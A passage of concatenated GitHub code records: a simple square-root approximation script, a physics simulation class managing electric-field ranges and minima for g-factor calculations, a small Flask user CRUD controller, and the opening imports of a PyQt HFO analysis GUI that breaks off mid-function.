Will\n\"\"\"\n\nsquare=float(input(\"Give a number\"))\nepsilon=0.0001\nguess=0.0\nincrement=0.0001\nnum_guesses=0\nwhile abs(guess**2-abs(square))>=epsilon and abs(guess)<=abs(square):\n guess+=increment\n num_guesses+=1\n if abs(guess**2)>abs(square):\n guess-=increment\n increment/=10\nprint(guess)\nprint(num_guesses)","repo_name":"cuichacha/MIT-6.00.1x","sub_path":"Week 2: Simple Programs/3. Simple Algorithms/approx solution with varying increment.py","file_name":"approx solution with varying increment.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39203720342","text":"from numpy import log2, ceil, sqrt, arccos, arctan2\nfrom numpy.linalg import norm\n\nfrom itertools import product\n\nfrom common import close, encase, percent, ϕ\nfrom common import echo, B_direction, inplane_vector_from_angle\nfrom fit import para_min, fit_min\nfrom psi import Psi\n\n\n# Structure class representing calculations for given structure and fields\nclass Structure():\n # Initialize object\n def __init__(self, sim, n_str, E_xy, B):\n # Assign variables\n self.sim = sim # Simulation object, needed to read files\n self.projectname = sim.projectname # Project name\n self.options = sim.options # Options object\n self.n_str = n_str # Structure number\n self.E_xy = E_xy # In-plane E-field list\n self.E_x = E_xy[0] # E-field in x direction\n self.E_y = E_xy[1] # E-field in y direction\n self.calcs = [] # Calculations list\n self.B = B if \"Brotate\" not in self.sim.output_filename else inplane_vector_from_angle(self.angle) # Magnetic field tuple\n self.B_val = norm(B) # Magnetic field magnitude\n self.B_x = self.B[0] # B-field in x direction\n self.B_y = self.B[1] # B-field in y direction\n self.B_z = self.B[2] # B-field in z direction\n # Min and max E-field considered for calculations\n self.limits = list(self.options.default_limits)\n self.B_direction = B_direction(self.B) if \"Brotate\" not in self.sim.output_filename else \"[110]\"\n self.additional = None\n self.coeffs = None\n self.minimum = None\n self.E_min_diff = None\n self.minimum_index = None\n\n # Previous structure in the list, may or may not be overwritten\n self.previous = None\n self.previous2 = None\n self.previous3 = None\n self.next = None\n self.next2 = None\n self.next3 = None\n\n 
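# Editor's aside: para_min and fit_min are imported from this project's fit
# module, which is not part of this record. parabola_minimum() further below
# appears to rely on the standard three-point parabola-vertex estimate; a
# sketch of that formula (an assumption about fit.py, not its actual code):
#
#     def para_min(c1, c2, c3):
#         # each argument carries .E_z (the field) and .anti (the gap), as in
#         # the calls para_min(self.calcs[i - 1], self.calcs[i], self.calcs[i + 1])
#         x1, x2, x3 = c1.E_z, c2.E_z, c3.E_z
#         y1, y2, y3 = c1.anti, c2.anti, c3.anti
#         num = x1**2 * (y2 - y3) + x2**2 * (y3 - y1) + x3**2 * (y1 - y2)
#         den = x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)
#         return 0.5 * num / den  # undefined when the three points are collinear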
###########################################################################\n # Ranges #\n ###########################################################################\n\n # Either outer or inner E-field range\n def E_range(self, outer=True, minimum=None):\n if minimum is not None:\n return self.minimum_range(minimum)\n else:\n return self.outer_range if outer else self.inner_range\n\n def minimum_range(self, minimum):\n left_border = minimum - self.options.minima_vicinity / 2.0\n right_border = minimum + self.options.minima_vicinity / 2.0\n left_list = [E for E in self.E_z_list if E <= left_border]\n right_list = [E for E in self.E_z_list if E >= right_border]\n if left_list and right_list:\n left = max(left_list)\n right = min(right_list)\n return (left, right)\n return None\n\n # Check if given E-field value is in range\n def in_range(self, E, outer=True, minimum=None):\n # This includes edge cases\n current_range = self.E_range(outer, minimum)\n return current_range[0] <= E <= current_range[1]\n\n # Check if given E-field value is in range\n def in_range_exclusive(self, E, outer=True, minimum=None):\n # This includes edge cases\n current_range = self.E_range(outer, minimum)\n return current_range[0] < E < current_range[1]\n\n # Return position within a range from 0 to 1, -1 if outside the range\n def pos_in_range(self, E, outer=True, minimum=None):\n if self.in_range(E, outer, minimum):\n distance_to_left = (E - self.E_range(outer, minimum)[0])\n return distance_to_left / self.span(outer, minimum)\n else:\n return -1\n\n # Inner and outer lengths of the ranges\n def span(self, outer=True, minimum=None):\n if minimum is None:\n return self.outer_span if outer else self.inner_span\n else:\n return self.minimum_span(minimum)\n\n @property\n def outer_span(self):\n return self.outer_range[1] - self.outer_range[0]\n\n @property\n def inner_span(self):\n return self.inner_range[1] - self.inner_range[0]\n\n def minimum_span(self, minimum):\n current_range = self.minimum_range(minimum)\n return current_range[1] - current_range[0]\n\n ###########################################################################\n # Gaps and bounds #\n ###########################################################################\n\n # Gap in Ez in percents, either maximum or at the bounds\n def gap(self, outer, maximum=False):\n E_list = self.E_list_in_range(outer)\n # If E_list empty return 100%\n if len(E_list) <= 1:\n return 1.0 if maximum else [1.0, 1.0]\n E_diff = self.E_diff_list_in_range(outer)\n # If maximum return largest gap\n if maximum:\n return max(E_diff) / self.span(outer)\n # Otherwise return gaps in the edges\n else:\n return E_diff[0] / self.span(outer), E_diff[-1] / self.span(outer)\n\n @property\n def right(self):\n span = self.outer_range[1] - self.inner_range[1] if self.options.gfactor_to_right else self.inner_range[0] - self.outer_range[0]\n if not span:\n return 1.0, 1.0\n if self.options.gfactor_to_right:\n span += self.E_diff_list_in_range(False)[-1]\n E_left = self.E_diff_list_in_range(False)[-1]\n E_right = self.E_diff_list_in_range(True)[-1]\n else:\n span += self.E_diff_list_in_range(False)[0]\n E_right = self.E_diff_list_in_range(False)[0]\n E_left = self.E_diff_list_in_range(True)[0]\n return E_left / span, E_right / span\n\n # E-field for calculations at the bounds\n def bound_E(self, i, outer, error=0):\n E_lists = self.E_diff_list_in_threshold(outer)\n if i == 0:\n return E_lists[0][0] + ϕ(error) * E_lists[0][1]\n elif i == 1:\n return E_lists[-1][0] + (1 - ϕ(error)) * 
E_lists[-1][1]\n\n # Precision of bounds calculation\n def bound_E_percent(self, i, outer):\n E_lists = self.E_diff_list_in_threshold(outer)\n if i == 0:\n return E_lists[0][1] / self.span(outer)\n elif i == 1:\n return E_lists[-1][1] / self.span(outer)\n\n ##########################################################################\n # E-field lists #\n ##########################################################################\n\n def E_boundary(self, outer=True, left=True):\n E_list = self.E_list_in_range(outer)\n if left:\n return [E_list[0], E_list[1]]\n else:\n return [E_list[-2], E_list[-1]]\n\n # List of all E-field values\n @property\n def E_z_list(self):\n result = [calc.E_z for calc in self.calcs]\n\n if result == []:\n result = [self.limits[0]] + result + [self.limits[1]]\n else:\n if self.limits[0] < result[0]:\n result = [self.limits[0]] + result\n if self.limits[1] > result[-1]:\n result = result + [self.limits[1]]\n\n return result\n\n # E-field list within a given range\n def E_list_in_range(self, outer):\n E_range = self.E_range(outer)\n return [i for i in self.E_z_list if E_range[0] <= i <= E_range[1]]\n\n # E-field differences list within a given range\n def E_diff_list_in_range(self, outer):\n E_list = self.E_list_in_range(outer)\n return [E_list[i] - E_list[i - 1] for i in range(1, len(E_list))]\n\n # E-field and their differences list within given range and threshold\n def E_diff_list_in_threshold(self, outer, threshold=0.0):\n E_list = self.E_list_in_range(outer)\n E_diff_list = self.E_diff_list_in_range(outer)\n return [(i, j) for i, j in zip(E_list, E_diff_list) if j >= threshold]\n\n ###########################################################################\n # Calculations #\n ###########################################################################\n\n # Calculate additional points in blank spaces\n def fill_blanks(self, outer=True):\n # Minimal size of blank space to be filled\n threshold = self.options.fill_blanks_limit * self.span(outer)\n\n # Loop over E-fields and differences within threshold\n for E, E_diff in self.E_diff_list_in_threshold(outer, threshold):\n # Number of points to fill the blank space\n n = int(E_diff / threshold)\n # Do calculations n times\n for j in range(n):\n Psi(self, outer=outer,\n E_z=E + E_diff * (j + 1) / (n + 1),\n eps_factor=self.eps_factor(outer),\n message=\"Filling blanks in \" + self.title(outer),\n E_diff=E_diff / self.span(outer) / n,\n error=self.options.fill_blanks_limit).run()\n\n # Calculate additional points in blank spaces\n def fill_blanks_near_anticrossing(self):\n # Minimal size of blank space to be filled\n threshold = self.options.fill_blanks_limit\n threshold *= self.span(outer=False, minimum=self.minimum.E_z)\n # Loop over E-fields and differences within threshold\n for E, E_diff in self.E_diff_list_in_threshold(False, threshold):\n if not self.in_range(E, outer=False, minimum=self.minimum.E_z):\n continue\n # Number of points to fill the blank space\n n = int(E_diff / threshold)\n # Do calculations n times\n for j in range(n):\n Psi(self, outer=False,\n E_z=E + E_diff * (j + 1) / (n + 1),\n eps_factor=self.eps_factor(False),\n message=\"Filling blanks in \" + self.title(False),\n E_diff=E_diff / self.span(False) / n,\n minimum=self.minimum.E_z,\n error=self.options.fill_blanks_limit).run()\n\n # Calculate bounds, either outer or inner\n def calc_bounds(self, outer=True, left=True, right=True):\n # Counter checking which side to calcule: 0 - left, 1 - right\n bounds = self.gap(outer)\n i = 0 if bounds[0] > 
bounds[1] else 1\n if right and not left:\n i = 1\n if left and not right:\n i = 0\n\n bounds_factor = self.bounds_factor(outer, i)\n # Do calculations as long as bounds are too large\n while max(bounds) >= self.options.bound_limit / bounds_factor:\n # Text to be displayed\n side = \"bounds to the right\" if i % 2 else \"bounds to the left\"\n # Additional factor to account for possible change in ranges\n bounds_factor = self.bounds_factor(outer, i)\n\n # Do calculation if density of the points not big enough\n if bounds[i % 2] >= self.options.bound_limit / bounds_factor:\n error = self.options.bound_limit / bounds_factor\n E_diff = bounds[i % 2]\n Psi(self, outer=outer,\n E_z=self.bound_E(i % 2, outer, E_diff),\n eps_factor=self.eps_factor(outer),\n E_diff=E_diff,\n message=\"Generating \" + self.title(outer) + \" \" + side,\n error=error\n ).run()\n # Else try the other side or stop calculation\n else:\n if left and right:\n i += 1\n # Else break as we want only one side to be calculated\n else:\n break\n # Update information about bounds\n bounds = self.gap(outer)\n\n def calc_right(self):\n bounds = self.right\n bounds_factor_left = self.bounds_right[0]\n bounds_factor_right = self.bounds_right[1]\n while bounds[1] >= self.options.right_limit / bounds_factor_right:\n bounds = self.right\n bounds_factor_right = self.bounds_right[1]\n message = \"Fine filling right\"\n if bounds[1] >= self.options.right_limit / bounds_factor_right:\n error = self.options.right_limit / bounds_factor_right\n E_diff = bounds[1]\n Psi(self, outer=True,\n E_z=self.bound_E(1 if self.options.gfactor_to_right else 0, self.options.gfactor_to_right, E_diff),\n eps_factor=self.eps_factor(self.options.gfactor_to_right),\n E_diff=E_diff,\n message=message,\n error=error\n ).run()\n while bounds[0] >= self.options.right_limit / bounds_factor_left:\n bounds = self.right\n bounds_factor_left = self.bounds_right[0]\n message = \"Fine filling left\"\n if bounds[0] >= self.options.right_limit / bounds_factor_left:\n error = self.options.right_limit / bounds_factor_left\n E_diff = bounds[0]\n Psi(self, outer=True,\n E_z=self.bound_E(1 if self.options.gfactor_to_right else 0, not self.options.gfactor_to_right, E_diff),\n eps_factor=self.eps_factor(not self.options.gfactor_to_right),\n E_diff=E_diff,\n message=message,\n error=error\n ).run()\n\n def calc_based_on_previous(self):\n for outer, left in product([True, False], [False, True]):\n message = \"Generating {} based on previous\".format(\n 'outer' if outer else 'inner')\n for struct in [self.previous, self.next, self.previous2, self.next2, self.previous3, self.next3]:\n if struct is None:\n continue\n for E in struct.E_boundary(outer, left)[::-1]:\n i = 0 if left else 1\n bounds = self.gap(outer)\n bounds_factor = self.bounds_factor(outer, i)\n if bounds[i] < self.options.bound_limit / bounds_factor:\n continue\n E_l, E_r = self.E_boundary(outer=outer, left=left)\n if E_l < E < E_r:\n Psi(self, outer,\n E_z=E,\n message=message,\n E_diff=bounds[i],\n eps_factor=self.eps_factor(outer),\n error=self.options.bound_limit / bounds_factor\n ).run()\n if self.options.calc_minima_from_previous and self.minimum is not None:\n for struct in [self.previous, self.next, self.previous2, self.next2, self.previous3, self.next3]:\n if struct is None:\n continue\n if not struct.has_minimum:\n continue\n if self.E_min_diff < self.options.minima_eps:\n continue\n here_range = self.minimum_range(self.E_min)\n if here_range is None:\n continue\n if here_range[0] < struct.E_min < 
here_range[1]:\n if close(here_range[0], struct.E_min):\n continue\n if close(here_range[1], struct.E_min):\n continue\n if close(self.minimum.E_z, struct.E_min):\n continue\n Psi(self, outer,\n E_z=struct.E_min,\n E_diff=(here_range[1] - here_range[0]\n ) / self.span(False),\n message=\"Generating minima from previous\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else self.E_min,\n error=self.options.minima_eps / self.span(outer)\n ).run()\n\n def bounds_factor(self, outer, i):\n bounds = self.gap(outer)\n if bounds[0] != 1:\n return 1 / (1 - bounds[(i + 1) % 2])\n else:\n return 1.0\n\n @property\n def bounds_right(self):\n bounds = self.right\n if bounds[0] != 1:\n return 1 / (1 - bounds[1]), 1 / (1 - bounds[0])\n else:\n return 1.0, 1.0\n\n ###########################################################################\n # Minima calculations #\n ###########################################################################\n\n def gen_various(self):\n if self.additional is not None:\n return None\n\n if self.sim.options.gtensor_E is None:\n bounds_factor_left = self.bounds_right[0]\n bounds_factor_right = self.bounds_right[1]\n bounds = self.right\n if bounds[1] >= self.options.right_limit / bounds_factor_right:\n return None\n if bounds[0] >= self.options.right_limit / bounds_factor_left:\n return None\n\n outer_range = self.E_range(True)\n inner_range = self.E_range(False)\n i = 1 if self.options.gfactor_to_right else 0\n E_goal = (inner_range[i] + outer_range[i]) / 2\n E_z = E_goal\n else:\n E_z = self.sim.options.gtensor_E\n\n Psi(self, outer=True,\n E_z=E_z,\n message=\"Generating additional data\",\n eps_factor=1e0\n ).run()\n\n # Find and generate points for minimas\n def gen_minimas(self, outer=False):\n if self.minimum is None:\n return None\n # Initialize counter variables\n do_bisection = 0\n\n while True:\n i = self.minimum_index\n if self.E_min_diff < self.options.minima_eps:\n return None\n do_bisection += 1\n # Decide which method to use\n if not do_bisection % self.options.bisection_freq:\n self.bisection_minimum(i, outer)\n elif do_bisection % self.options.parabola_freq:\n self.fitting_minimum(i, outer)\n else:\n self.parabola_minimum(i, outer)\n\n # Look for a minimum using bisection method\n def bisection_minimum(self, i, outer):\n E_list = self.E_list_minimum(i)\n # Calculate to the left\n error = self.options.minima_eps / self.span(outer)\n E_diff = self.E_min_diff / self.span(outer)\n if self.calcs[i - 1].anti > self.calcs[i + 1].anti:\n E_z = E_list[1] - (E_list[1] - E_list[0]) * (1 - ϕ(E_diff))\n # Calculate to the right\n else:\n E_z = E_list[1] + (E_list[2] - E_list[1]) * (1 - ϕ(E_diff))\n # Run the calculation\n Psi(self, outer,\n E_z=E_z*0.98+(E_list[2] + E_list[0])/2*0.02,\n E_diff=E_diff,\n message=\"Generating minima by bisection\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=error\n ).run()\n\n # Look for a minimum using parabola method\n def parabola_minimum(self, i, outer):\n E_list = self.E_list_minimum(i)\n # Find E-field for a suspected minimum\n E_min = para_min(self.calcs[i - 1], self.calcs[i], self.calcs[i + 1])\n # Exit if parabola calculations are not precise enough\n if not E_list[0] < E_min < E_list[2]:\n echo(\"Fitting by fitting v2 skipped! 
\" +\n \"{} not in range {}-{}\".format(E_min, E_list[0], E_list[2]))\n # Calculate point for the suspected minimum if not already calculated\n if not close(E_min, E_list[1]):\n Psi(self, outer,\n E_z=E_min*0.98+(E_list[2] + E_list[0])/2*0.02,\n E_diff=self.E_min_diff / self.span(outer),\n message=\"Generating minima by parabolas\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=self.options.minima_eps / self.span(outer)\n ).run()\n # Calculate two points nearby to get proper range\n else:\n for sign in [-1, 1]:\n if self.E_min_diff < self.options.minima_eps:\n return None\n side = \"left\" if sign == -1 else \"right\"\n Psi(self, outer,\n E_z=E_min + sign * self.options.minima_eps / 20,\n E_diff=self.E_min_diff / self.span(outer),\n message=\"Minima confirmed, \" + side + \" vicinity\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=self.options.minima_eps / self.span(outer)\n ).run()\n\n def fitting_minimum(self, i, outer):\n E_list = self.E_list_minimum(i)\n # Find E-field for a suspected minimum\n x = [c.E_z for c in self.calcs if c.E_z in E_list]\n y = [c.anti for c in self.calcs if c.E_z in E_list]\n E_min = fit_min(x, y, x_0=x[1])\n # Exit if parabola calculations are not precise enough\n if not E_list[0] < E_min < E_list[2]:\n echo(\"Fitting by fitting v2 skipped! \" +\n \"{} not in range {}-{}\".format(E_min, E_list[0], E_list[2]))\n # Calculate point for the suspected minimum if not already calculated\n elif not close(E_min, E_list[1]):\n Psi(self, outer,\n E_z=E_min*0.98+(E_list[2] + E_list[0])/2*0.02,\n E_diff=self.E_min_diff / self.span(outer),\n message=\"Generating minima by fitting\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=self.options.minima_eps / self.span(outer)).run()\n\n ##########################################################################\n # Minima misc. 
#\n ##########################################################################\n\n # Check if a given point is a local minimum\n def is_local_minimum(self, i):\n min_neighbor = min(self.calcs[i + 1].anti, self.calcs[i - 1].anti)\n return self.calcs[i].anti < min_neighbor\n\n # List of E-field triplets\n def E_list_minimum(self, i):\n return [self.calcs[i + x].E_z for x in [-1, 0, 1]]\n\n # E-field difference around a minimum\n def E_diff_minimum(self, i):\n return self.calcs[i + 1].E_z - self.calcs[i - 1].E_z\n\n # Check if the structure has a minimum\n @property\n def has_minimum(self):\n return self.minimum is not None\n\n ###########################################################################\n # Update properties #\n ###########################################################################\n\n # Update limits\n def update_limits(self):\n # Update if calculations list is not empty, otherwise do nothing\n if self.calcs:\n # Decrease left side limit\n if self.limits[0] + self.options.limit_update > self.calcs[0].E_z:\n self.limits[0] = self.calcs[0].E_z - self.options.limit_update\n # Increase right side limit\n if self.limits[1] - self.options.limit_update < self.calcs[-1].E_z:\n self.limits[1] = self.calcs[-1].E_z + self.options.limit_update\n\n # Update ranges, both outer and inner\n def update_ranges(self):\n self.update_range(outer=True)\n self.update_range(outer=False)\n\n # Update either outer or inner range\n def update_range(self, outer=True):\n # Set to the default range\n range = self.limits[:]\n\n # Define values for definitions\n limit = self.options.limit\n low_lim_l = ((1 - limit) if outer else (1 - limit))\n up_lim_l = limit if outer else 0.0\n low_lim_r = limit\n up_lim_r = (1.0 - limit) if outer else 1.0\n\n # Compare every calculation to define ranges\n left_range_found = False\n for calc in self.calcs:\n # Left side range\n if calc.local_low > low_lim_l and calc.local_up > up_lim_l:\n if not left_range_found:\n range[0] = calc.E_z\n else:\n left_range_found = True\n # Right side range\n if calc.local_low < low_lim_r:\n if calc.local_up < up_lim_r:\n if range[1] == self.limits[1]:\n range[1] = calc.E_z\n # Exit as range is already found\n break\n # Assign newly found range\n if outer:\n self.outer_range = tuple(range)\n else:\n self.inner_range = tuple(range)\n\n @property\n def E_min(self):\n return self.minimum.E_z\n\n def update_minimum(self):\n self.minimum = None\n self.minimum_index = None\n self.E_min_diff = None\n for i, calc in enumerate(self.calcs[1:-1]):\n if self.in_range_exclusive(calc.E_z, False):\n if calc.anti > self.calcs[i].anti:\n continue\n if calc.anti > self.calcs[i + 2].anti:\n continue\n if self.minimum is None or calc.anti < self.minimum.anti:\n self.minimum = calc\n self.E_min_diff = self.calcs[i + 2].E_z - self.calcs[i].E_z\n self.minimum_index = i + 1\n\n ###########################################################################\n # Output and infos #\n ###########################################################################\n\n def title(self, outer):\n return \"outer\" if outer else \"inner\"\n\n def range_confidence(self, outer):\n return encase([percent(i) for i in self.gap(outer)])\n\n @property\n def opt_Ez_piezo(self):\n left_outer, right_outer = self.outer_range\n left_inner, right_inner = self.inner_range\n left = abs(left_outer - left_inner)\n right = abs(right_outer - right_inner)\n if left > right:\n return (left_outer * 0.5 + left_inner * 0.5)\n else:\n return (right_outer * 0.5 + right_inner * 0.5)\n\n 
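# Editor's aside: update_minimum() above keeps the deepest interior calculation
# whose .anti value does not exceed either neighbour. The same scan over plain
# (E_z, anti) pairs, as a self-contained sketch with hypothetical sample data:
#
#     def smallest_local_minimum(points):
#         best = None
#         for i in range(1, len(points) - 1):
#             y = points[i][1]
#             if y > points[i - 1][1] or y > points[i + 1][1]:
#                 continue  # exceeds a neighbour, so not a local minimum
#             if best is None or y < points[best][1]:
#                 best = i
#         return best  # index of the deepest local minimum, or None
#
#     smallest_local_minimum([(0.0, 5.0), (0.1, 2.0), (0.2, 3.0), (0.3, 1.0), (0.4, 4.0)])  # -> 3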
##########################################################################\n # Other misc. #\n ##########################################################################\n\n # Epsilon factor for kp calculations\n def eps_factor(self, outer):\n return self.options.eps_factor_for_outer if outer else 1\n\n # Sort calculations, if there are any\n def sort_per_Ez(self):\n if self.calcs:\n self.calcs.sort()\n\n # Check if calculation belongs to the structure\n def calc_belongs(self, calc):\n # Structure number is correct\n if self.n_str == calc.n_str:\n # In-plane electric field is correct\n if close(self.E_x, calc.E[0]) and close(self.E_y, calc.E[1]):\n # Magnetic field is correct\n if (close(self.B[0], calc.B[0]) and close(self.B[1], calc.B[1])\n and close(self.B[2], calc.B[2])):\n return True\n return False\n\n # Deleted repeated records\n def remove_repeats(self):\n i = 0 # Counter variable\n # Go over all pairs of neighbors\n while i < len(self.calcs) - 1:\n # If E_z is the same remove record due to unnecessary repeat\n # This increases counter by decreasing list length\n if self.calcs[i].E_z == self.calcs[i + 1].E_z:\n # if self.projectname == \"E_field\":\n # echo(self.projectname+\"\\t\" +str(self.calcs[i].n_str) + \"\\t\" + str(self.calcs[i].n_calc))\n self.calcs.pop(i)\n # Else increase counter\n else:\n i += 1\n\n @property\n def gfactors(self):\n if self.additional is not None:\n return [self.additional.g_low, self.additional.g_up]\n return [None, None]\n\n @property\n def gfactors_sign_diff(self):\n if self.additional is not None:\n return self.gfactors[0] * self.gfactors[1] < 0.0\n return None\n\n @property\n def piezo(self):\n return self.additional.piezo\n\n @property\n def gfactor_diff(self):\n if self.gfactors[0] is None:\n return None\n return self.gfactors[0] - self.gfactors[1]\n\n @property\n def gfactor_sum(self):\n return sum(self.gfactors)\n\n @property\n def theta(self):\n return arccos(self.B_z)\n\n @property\n def phi(self):\n if self.B_x == self.B_y == 0.0:\n return 0.0\n else:\n return arctan2(self.B_y, self.B_x)\n\n @property\n def n(self):\n n = 1 if self.additional is None else 0\n # if \"gtensor\" in self.sim.output_filename:\n # return 1 if self.additional is None else 0\n # if self.options.calc_additional:\n # return 1 if self.additional is None else 0\n for outer, left in product([True, False], repeat=2):\n bounds = self.gap(outer)\n bounds_factor = self.bounds_factor(outer, left)\n x = bounds[left % 2] / self.options.bound_limit * bounds_factor\n n += max(int(ceil(log2(x))), 0)\n for i, bound in enumerate(self.right):\n bound *= self.bounds_right[i] / self.options.right_limit\n if bound > 0:\n n += max(int(ceil(log2(bound))), 0)\n # Loop over all triplets of neighboring points\n if self.has_minimum:\n x = self.E_min_diff / self.options.minima_eps\n n += min(max(int(ceil(log2(x)/3)), 0), 5)\n return n\n\n @property\n def x_axis(self):\n if \"B_field_gfactor\" in self.sim.output_filename:\n return self.B_val\n elif \"rotate\" in self.projectname:\n return self.angle\n elif \"anticrossing_gfactor\" in self.sim.output_filename:\n return self.B_val\n elif self.projectname == \"E_field\":\n if self.E_x < 0 and self.E_y < 0:\n return -sqrt(self.E_x**2 + self.E_y**2)\n return sqrt(self.E_x**2 + self.E_y**2)\n elif \"shift\" in self.projectname:\n if \"compensation\" in self.sim.output_filename:\n if self.E_x < 0 and self.E_y < 0:\n return - sqrt(self.E_x**2 + self.E_y**2)\n elif self.E_y == 0:\n return self.E_x\n return sqrt(self.E_x**2 + self.E_y**2)\n else:\n i = 
self.n_str - 1\n if self.n_str == 23:\n i = 0.5\n if self.n_str == 24:\n i = 1.5\n i = i * 2 # / 6.0 * 5.65\n if \"110\" in self.projectname:\n return i * sqrt(2)\n if \"100\" in self.projectname:\n return i\n elif \"diffc\" in self.projectname:\n return 0.15 + 0.05 * self.n_str if self.n_str <= 17 else 0.05 * (self.n_str - 17)\n elif \"diffH\" in self.projectname:\n return 84 + 6 * self.n_str\n elif \"topvar\" in self.projectname:\n return -84 + 12 * self.n_str\n elif \"downvar\" in self.projectname:\n return -72 + 12 * self.n_str if self.n_str != 13 else -72\n elif \"diffD\" in self.projectname:\n return 3 * self.n_str\n elif \"diffR\" in self.projectname:\n return 78 + 6 * self.n_str\n elif \"elong\" in self.projectname:\n if \"E110\" in self.sim.output_filename:\n if self.E_x < 0 and self.E_y < 0:\n return -sqrt(self.E_x**2 + self.E_y**2)\n return sqrt(self.E_x**2 + self.E_y**2)\n elif \"E100\" in self.sim.output_filename:\n return self.E_x\n elif \"_100\" in self.projectname:\n if self.n_str < 12:\n return 0.4 + 0.1 * self.n_str\n elif self.n_str == 13:\n return 1.05\n elif 14 <= self.n_str <= 18:\n return 0.2 + 0.1 * self.n_str\n elif 19 <= self.n_str <= 23:\n return -1.35 + 0.1 * self.n_str\n elif \"_110\" in self.projectname:\n if self.n_str <= 16:\n return 0.4 + 0.1 * self.n_str\n elif 17 <= self.n_str <= 21:\n return -1.15 + 0.1 * self.n_str\n else:\n assert False, \"Error, \" + self.projectname + \" doesn't work!\"\n\n @property\n def angle(self):\n assert \"rotate\" in self.projectname, self.projectname\n if \"shift\" in self.projectname:\n # return 50 - 5 * self.n_str if self.n_str <= 10 else 32.5 - 5 * (self.n_str - 16)\n if self.n_str <= 10 :\n return 50 - 5 * self.n_str\n elif self.n_str <= 22:\n return 32.5 - 5 * (self.n_str - 16)\n elif self.n_str <= 33:\n return 83.75 - 2.5 * self.n_str\n elif self.n_str == 34:\n return 1.875\n elif self.n_str == 35:\n return 0.625\n else: # Elongation along real x with shifting crystal\n if self.n_str <= 10:\n return 50 - 5 * self.n_str\n elif self.n_str <= 14:\n return 15 - self.n_str\n elif self.n_str == 15:\n return 7.5\n elif self.n_str == 16:\n return 12.5\n elif self.n_str == 17:\n return 16\n elif self.n_str == 18:\n return 14\n elif self.n_str == 19:\n return 13\n elif self.n_str == 20:\n return 17\n elif self.n_str < 24:\n return -5 * (self.n_str - 20)\n elif self.n_str == 24:\n return 15.9412\n elif self.n_str == 25:\n return 15.8824\n elif self.n_str == 26:\n return 15.9446\n elif self.n_str == 27:\n return 50\n elif self.n_str == 28:\n return 11.25\n elif self.n_str == 29:\n return 8.75\n elif self.n_str == 30:\n return 6.25\n","repo_name":"MatKrzykowski/gfactor","sub_path":"structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":34522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10822743600","text":"from flask_app import app\nfrom flask import render_template, request, redirect, session, flash\nfrom flask_app.models.user import User\n\n@app.route('/')\ndef dashboard():\n return render_template(\"dashboard.html\")\n\n\n@app.route('/createUser', methods = ['POST'])\ndef createUser():\n data = {\n 'first_name' : request.form['first_name'],\n 'last_name' : request.form['last_name'],\n 'email' : request.form['email']\n }\n User.add_user(data)\n return redirect('/showInfo')\n\n\n#this shows info about all users\n@app.route('/showInfo')\ndef showInfo():\n users = User.getAllUsers()\n return render_template(\"showInfo.html\", users = 
users)\n\n\n\n#this shows info about a specific user, looked up by id\n@app.route('/showUser/<int:id>')\ndef userInfo(id):\n data = {\n 'id' : id\n }\n \n return render_template(\"showUser.html\", users = User.getUserById(data))\n\n@app.route('/edit/<int:id>')\ndef functiontoedit(id):\n data = {\n 'id': id\n }\n return render_template(\"editUser.html\", users = User.getUserById(data))\n\n@app.route('/editUser/<int:id>', methods = ['POST'])\ndef updateUser(id):\n data = {\n 'first_name' : request.form['first_name'],\n 'last_name' : request.form['last_name'],\n 'email' : request.form['email'],\n 'id': id\n }\n User.updateUser(data)\n return redirect('/showInfo')\n\n@app.route('/deleteUser/<int:id>')\ndef deleteSomeUser(id):\n data = {\n 'id': id\n }\n User.deleteUser(data)\n return redirect('/showInfo')\n\n\n","repo_name":"BlertaKola/flask_mysql_users","sub_path":"flask_app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
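(Editor's note on users.py above: the route decorators had lost their angle-bracket converters, most likely stripped as HTML-like markup during text extraction; they were restored here from the handler signatures. For reference, the standard Flask pattern in use is:)

    @app.route('/showUser/<int:id>')  # <int:id> converts the path segment to an int
    def userInfo(id):                 # and passes it in as the `id` argument
        ...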
 +{"seq_id":"43567753067","text":"from PyQt5 import QtCore, QtWidgets, QtGui\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox\nimport matplotlib.pyplot as plt\n\nimport pyqtgraph as pg\nimport matplotlib.ticker as ticker\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport pyqtgraph as pg # We will try using pyqtgraph for plotting\nimport time\nimport mne\n# from superqt import QDoubleRangeSlider\nfrom tqdm import tqdm\nimport os\nfrom src.hfo_app import HFO_App\nfrom src.hfo_feature import HFO_Feature\n\nfrom src.utils.utils_annotation import *\n\nimport random\nimport scipy.fft as fft #FFT plot (5)\nimport scipy.signal as signal\nimport numpy as np\n\nimport re\nfrom pathlib import Path\nfrom src.hfo_app import HFO_App\nfrom src.param.param_classifier import ParamClassifier\nfrom src.param.param_detector import ParamDetector, ParamSTE, ParamMNI\nfrom src.param.param_filter import ParamFilter\nfrom src.utils.utils_gui import *\nfrom src.ui.plot_waveform import *\n# import FormatStrFormatter\nfrom matplotlib.ticker import FormatStrFormatter\n\n\n# from src.ui.plot_annotation_waveform import *\n# from src.ui.a_channel_selection import AnnotationChannelSelection \n\n# from src.plot_time_frequency import PlotTimeFrequencyNoLabel\nfrom src.utils.utils_plotting import *\n# from src.plot_time_frequency import MainWindow\n\nimport multiprocessing as mp\nimport torch\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\n#import fft \nimport scipy.fft as fft\n\n\ndef custom_formatter(x, pos):\n # if number >1000, then use scientific notation but still fix the width to 5\n max_width = 5\n if abs(x) > 1000:\n return f'{x:.0e}'\n # 4 digits + 1 for potential negative sign\n formatted_number = f' {x:.0f}' if 